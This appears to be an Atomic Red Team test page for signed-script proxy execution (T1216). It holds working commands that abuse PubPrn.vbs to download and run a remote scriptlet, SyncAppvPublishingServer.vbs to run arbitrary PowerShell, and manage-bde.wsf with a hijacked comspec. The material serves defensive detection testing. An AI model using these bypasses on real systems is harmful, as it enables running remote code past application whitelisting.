Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command:
cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.pngThere are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)
-
Atomic Test #2 - SyncAppvPublishingServer Signed Script PowerShell Command Execution
-
Atomic Test #3 - manage-bde.wsf Signed Script Command Execution
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/src/T1216.sct |
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_to_execute | A PowerShell command to execute. | string | Start-Process calc |
C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_to_execute | A command to execute. | Path | C:\Windows\System32\calc.exe |
set comspec=#{command_to_execute}
cscript manage-bde.wsf
set comspec=C:\Windows\System32\cmd.exe